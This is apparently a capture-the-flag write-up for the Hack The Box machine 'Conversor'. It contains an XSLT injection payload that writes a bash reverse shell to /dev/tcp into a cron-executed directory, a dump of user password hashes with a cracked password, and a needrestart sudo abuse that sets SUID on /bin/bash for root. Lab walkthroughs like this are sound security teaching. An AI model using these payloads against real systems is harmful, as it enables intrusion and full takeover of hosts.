Hackthebox: Conversor

Overview

Conversor is an easy-difficulty machine from Hack The Box that starts with a web application allowing XSLT file uploads. By leveraging XSLT injection to write a malicious Python script into a cron-executed directory, we gain initial access as www-data. From there, we extract a SQLite database containing user credentials, crack the hash, and pivot to user fismathack. Privilege escalation abuses a sudo misconfiguration on needrestart, which allows loading an arbitrary configuration file to achieve root.

Conversor-info-card

Reconnaissance

Starting with a port scan, we identify two open services.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)
|_  256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://conversor.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 redirects to http://conversor.htb/ — we add it to /etc/hosts and proceed.

Web Enumeration

The application is an XSLT converter. Navigating to the About page reveals a link to download the source code.

http://conversor.htb/static/source_code.tar.gz

Reviewing the source, we find the application accepts XSLT file uploads and processes them. Looking at install.md, we find a cronjob definition that executes every Python script under the scripts/ directory every minute as www-data.

"""

* * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 "$f"; done

"""

This is interesting — if we can write a .py file into /var/www/conversor.htb/scripts/, it will be executed automatically.

XSLT Injection - Initial Access

XSLT injection can be leveraged not just for reading files, but also for writing files using the exslt:document extension. We craft a malicious XSLT stylesheet that writes a Python reverse shell into the cron-executed scripts/ directory.

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:ptswarm="http://exslt.org/common"
  extension-element-prefixes="ptswarm"
  version="1.0">
  <xsl:template match="/">
    <ptswarm:document href="/var/www/conversor.htb/scripts/shell.py" method="text">
import os

os.system(
    "bash -c 'bash -i &gt;&amp; /dev/tcp/10.10.16.10/9001 0&gt;&amp;1'")
    </ptswarm:document>
  </xsl:template>
</xsl:stylesheet>

We upload the provided nmap.xslt file from http://conversor.htb/static/nmap.xslt as the XML input and our malicious XSLT file as the stylesheet. After waiting about a minute for the cronjob to trigger, we catch a reverse shell.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.10] from (UNKNOWN) [10.129.123.196] 43572
bash: cannot set terminal process group (12609): Inappropriate ioctl for device
bash: no job control in this shell
www-data@conversor:~$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@conversor:~$

Lateral Movement

Enumerating the web application directory, we find a SQLite database under instance/.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.10] from (UNKNOWN) [10.129.123.196] 43572
bash: cannot set terminal process group (12609): Inappropriate ioctl for device
bash: no job control in this shell
www-data@conversor:~$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@conversor:~$ ls
ls
conversor.htb
www-data@conversor:~$ cd conversor.htb
cd conversor.htb
www-data@conversor:~/conversor.htb$ ls
ls
app.py
app.wsgi
instance
__pycache__
scripts
static
templates
uploads
www-data@conversor:~/conversor.htb$ cd instance
cd instance
www-data@conversor:~/conversor.htb/instance$ ls
ls
users.db

We exfiltrate users.db by base64-encoding it and dumping the credentials.

┌──(kali㉿kali)-[~]
└─$ sqlite3 users.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
files  users
sqlite> select * from users;
1|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec
5|kujen|9e76bf31e3d126e7343fbf989e196d43
sqlite>

Cracking the MD5 hash for fismathack gives us Keepmesafeandwarm. We su to the user and grab the user flag.

su fismathack
Password: Keepmesafeandwarm
id
uid=1000(fismathack) gid=1000(fismathack) groups=1000(fismathack)
bash
cd
cat user.txt
c462efcebb61b11cb0b36b8ae1a3c366

Privilege Escalation

Checking sudo permissions, fismathack can run needrestart as root without a password.

sudo -l
Matching Defaults entries for fismathack on conversor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User fismathack may run the following commands on conversor:
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart

needrestart accepts a -c flag to specify a custom configuration file. Since the configuration file is parsed as Perl, we can inject arbitrary Perl code. We write a one-liner that sets the SUID bit on /bin/bash and pass it as the config file.

echo 'system("chmod +s /bin/bash")' > exp.sh
sudo /usr/sbin/needrestart -c exp.sh

Running kernel seems to be up-to-date.

No services need to be restarted.

No containers need to be restarted.

No user sessions are running outdated binaries.

No VM guests are running outdated hypervisor (qemu) binaries on this host.
ls -al /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14  2024 /bin/bash
bash -p
id
uid=1000(fismathack) gid=1000(fismathack) euid=0(root) egid=0(root) groups=0(root),1000(fismathack)
cat /root/root.txt
45ade82a3db2d681742363c137fd7418

Hope you learned something new!

• 0xkujen